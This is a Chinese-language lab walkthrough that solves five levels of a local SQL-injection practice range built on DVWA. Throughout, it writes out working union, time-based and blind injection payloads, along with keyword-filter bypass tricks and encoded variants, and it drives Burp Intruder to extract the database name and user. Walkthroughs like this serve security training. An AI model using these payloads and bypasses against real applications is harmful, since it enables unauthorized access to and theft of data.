SQL注入【ByPass有点难的靶场实战】(九)

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

0、总体思路

先确认是否可以SQL注入,使用单双引号,1/0,括号测试 ’ " 1/0 ),页面显示不同内容或响应长度来确定。存在SQL注入后则开始构造轮子进行验证,猜出数据库,用户名,表名,字段名,有没有文件漏洞等。

为方便验证提交拦截到BP,右击到Repeater修改参数值进行验证看响应内容。

特殊字符说明

+表示空格
--表示注释

复制sqli-bypass压缩包到sqli项目下,解压并重命名为bypass,其中里面的数据库dvwa,请参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》的dvwa,启动小皮的Apache和MySQL服务。

1、index1

1.1、判断是否存在SQL注入

正常响应值

SQL注入【ByPass有点难的靶场实战】(九)_第1张图片

在参数后面拼接上单引号' 发现响应长度有变化,拼接上两个单引号又正常响应长和回显了,因此存在SQL注入。

还有一种方式,就是在知道源码的情况下,可以把语句复制到mysql数据库编辑器比如navcat,去查询,构造确认这样更方便理解SQL注入为什么是这么拼的。
SQL注入【ByPass有点难的靶场实战】(九)_第2张图片
SQL注入【ByPass有点难的靶场实战】(九)_第3张图片

由此说明参数是有单引号闭合的,看源码也可确定是单引号包含着,这个是注入构造语句的关键点
SQL注入【ByPass有点难的靶场实战】(九)_第4张图片

1.2、确定回显字段

使用order by 数字来确定回显字段,发现提示:请勿SQL注入!!!,应该是空格被过滤了

# 注入语句
?id=1+order+by+5--+

SQL注入【ByPass有点难的靶场实战】(九)_第5张图片

使用注释方式/**/ 拼接看,发现可正常显示,把列数调整到10发现,不回显,不报错,可能是列数不到10,往下调到8正常显示,因此可确定查询的列数是8

# 正常显示
?id=1'/**/order/**/by/**/5%23
# 10列不显示
?id=1'/**/order/**/by/**/10%23
# 8列正常显示,
?id=1'/**/order/**/by/**/10%23

SQL注入【ByPass有点难的靶场实战】(九)_第6张图片

使用union来确定显示的是哪个列,注意查询参数要不存在的,否则显示是存在的数据,确定显示的列数是第4,5列

?id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,8/**/'

SQL注入【ByPass有点难的靶场实战】(九)_第7张图片

1.3、联合查询爆出

把第4,5列依次替换成数据名,当前登录名

?id=-1'/**/union/**/select/**/1,2,3,database(),user(),6,7,8/**/'

SQL注入【ByPass有点难的靶场实战】(九)_第8张图片

2、index2

2.1、判断是否存在SQL注入

同1、index1

2.2、确定回显字段

看源码是过滤了关键字:andor ,同时错误信息不回显出来,所以是盲注,在确定列数时使用order,尝试用大小写 oRder

# 10列不显示信息,往下调整到8正常显示
?id=1'+oRder+by+10--+'

?id=1'+oRder+by+8--+'

SQL注入【ByPass有点难的靶场实战】(九)_第9张图片

判断哪第几列对应显示,使用union,由于跟index1查相同的列,是第4,5列

# 注入语句
?id=-1'+union+select+1,2,3,4,5,6,7,8--+'

# 关键显示信息
Your Login name:4
Your Password:5
2.3、联合查询爆出

把第4,5列依次替换成数据名,当前登录名

# 注入语句
?id=-1'+union+select+1,2,3,database(),user(),6,7,8--+'

# 关键显示信息
Your Login name:dvwa
Your Password:root@localhost

3、index3

3.1、判断是否存在SQL注入

同1、index1

该示例还是可以用order by 的方式来确认查询的列数,再用union联合查询的方式来爆出数据库名,但想用其他方式来验证知识点,所以用下面的方式。

3.2、使用时间盲注

看源码是过滤了关键字:andor ,同时错误信息不回显出来,使用时间盲注来爆破数据库

关键字过滤绕过,尝试采用重复的方式处理
anandd --> and

# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'

SQL注入【ByPass有点难的靶场实战】(九)_第10张图片

3.3、爆破数据库长度
# 输入内容
?id=1'+anandd+if(length(database())=2,1,0)--+'

在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到数字2,这个值任意填写的。Attack Type选择:Sniper,参数设置看截图说明。
SQL注入【ByPass有点难的靶场实战】(九)_第11张图片

设置Payloads参数

SQL注入【ByPass有点难的靶场实战】(九)_第12张图片

分析攻击结果
SQL注入【ByPass有点难的靶场实战】(九)_第13张图片

从爆破结果得到数据库长度是4

3.4、爆破数据库名
# 输入内容
?id=1'+anandd+if(substr(database(),1,1)='a',1,0)--+'

爆破参数设置看截图说明,需要2个参数,第一个是截取的数据库对应的字段索引,第二个是匹配的内容。
SQL注入【ByPass有点难的靶场实战】(九)_第14张图片

设置Payloads参数
SQL注入【ByPass有点难的靶场实战】(九)_第15张图片
SQL注入【ByPass有点难的靶场实战】(九)_第16张图片

分析攻击结果
SQL注入【ByPass有点难的靶场实战】(九)_第17张图片

从爆破结果得到数据库名是dvwa

4、index4

4.1、判断是否存在SQL注入

同1、index1,只是index4报错信息有抛出来,更方便定位问题。

4.2、使用时间盲注

看源码是过滤了关键字:andor ,错误信息有回显出来,使用时间盲注来爆破数据库

关键字过滤绕过,尝试采用重复的方式处理
anandd --> and

# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'

发现有提示,没办法使用双写and的方式
SQL注入【ByPass有点难的靶场实战】(九)_第18张图片

看源码是在取参数时有做urldecode,所以尝试使用&&替换and方式,再使用在线URL编码工具进行编码

在线编码解码网址:https://www.gjk.cn/urlencode

# 编码前的poc
1'+&&+if(1=1,sleep(1),sleep(2))--+'

# 编码后的poc
1%27%2B%26%26%2Bif%281%3D1%2Csleep%281%29%2Csleep%282%29%29--%2B%27

注意:POC复制到URL那边是接到?id=后面,执行后,发现可行
SQL注入【ByPass有点难的靶场实战】(九)_第19张图片

4.3、爆破数据库长度
# 编码前的poc,注意X是为了方便编码后定位打标识
1'+&&+if(length(database())=X,1,0)--+'

#编码后的poc
1%27%2B%26%26%2Bif%28length%28database%28%29%29%3DX%2C1%2C0%29--%2B%27

注意:POC复制到URL那边是接到?id=后面

在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到数字X,这个值任意填写的。Attack Type选择:Sniper,参数打标识如下
SQL注入【ByPass有点难的靶场实战】(九)_第20张图片

设置Payloads参数、分析攻击结果和第3.3关一样的,我就不再截图了。爆出结果数据库长度是4。

4.4、爆破数据库名
# 编码前的poc,注意X,Y是为了方便编码后定位打标识
1'+&&+if(substr(database(),X,1)='Y',1,0)--+'

#编码后的poc
1%27%2B%26%26%2Bif%28substr%28database%28%29%2CX%2C1%29%3D%27Y%27%2C1%2C0%29--%2B%27

注意:POC复制到URL那边是接到?id=后面

爆破参数设置看截图说明,需要2个参数,第一个X是截取的数据库对应的字段索引,第二个Y是匹配的内容。
SQL注入【ByPass有点难的靶场实战】(九)_第21张图片

设置Payloads参数、分析攻击结果和第3.4关一样的,我就不再截图了。从爆破结果得到数据库名是dvwa

5、index5

5.1、判断是否存在SQL注入

同1、index1,不过index5报错信息也有抛出来,更方便定位问题。

5.2、使用时间盲注

看源码是过滤了很多关键字,错误信息有回显出来,使用时间盲注来爆破数据库

关键字过滤绕过,尝试采用重复的方式处理,成功了
anandd --> and

# 注入语句
?id=1'+anandd+if(1=1,sleep(1),sleep(2))--+'

SQL注入【ByPass有点难的靶场实战】(九)_第22张图片

5.3、爆破数据库长度
# 尝试使用POC
?id=1'+anandd+if(length(database())=2,1,0)--+'

SQL注入【ByPass有点难的靶场实战】(九)_第23张图片

发现有报错信息,从报错信息分析出来database()=都被过滤掉了,尝试替换如下

database() --> schema()

# 看源码in也被过滤了,所以用between 4 and 4 来等价 =4 ,由于and也会被过滤,同上面一样采用双写的方式
= 4 --> between 4 anandd 4

# 因此最终可行的POC
?id=1'+anandd+if(length(schema())+between+4+anandd+4,1,0)--+'

在Repeater右击发送到Intruder,先清除默认的标志位,自己定位到两个数字4,这个值任意填写的。Attack Type选择:Pitchfork,参数设置看截图说明。
SQL注入【ByPass有点难的靶场实战】(九)_第24张图片

设置Payloads参数
SQL注入【ByPass有点难的靶场实战】(九)_第25张图片
SQL注入【ByPass有点难的靶场实战】(九)_第26张图片

分析攻击结果,爆出结果数据库长度是4。
SQL注入【ByPass有点难的靶场实战】(九)_第27张图片

5.4、爆破数据库名
# 尝试使用POC
?id=1'+anandd+if(substr(schema(),1,1)+between+'a'+anandd+'a',1,0)--+'

SQL注入【ByPass有点难的靶场实战】(九)_第28张图片

发现有报错信息,从报错信息分析出来substr()被过滤掉了,因为上一步骤现在变化点就是函数substr(),尝试使用mid()替换,发现可以,没有报错信息了

# 尝试使用POC
?id=1'+anandd+if(mid(schema(),1,1)+between+'a'+anandd+'a',1,0)--+'

爆破参数设置看截图说明,需要2个参数,第一个是截取的数据库对应的字段索引,第二个是匹配的内容。
SQL注入【ByPass有点难的靶场实战】(九)_第29张图片

设置Payloads参数
SQL注入【ByPass有点难的靶场实战】(九)_第30张图片
SQL注入【ByPass有点难的靶场实战】(九)_第31张图片
SQL注入【ByPass有点难的靶场实战】(九)_第32张图片

分析攻击结果,从爆破结果得到数据库名是dvwa
SQL注入【ByPass有点难的靶场实战】(九)_第33张图片

6、资料获取和下期内容预告

如果需要sqli-bypass压缩包,请关注我的公众号:大象只为你,回复关键字:bypass靶场。

下期内容将会分享文件上传相关的内容,敬请关注我的公众号,持续更新中…

你可能感兴趣的:(跟我学网安知识,sql,网络安全)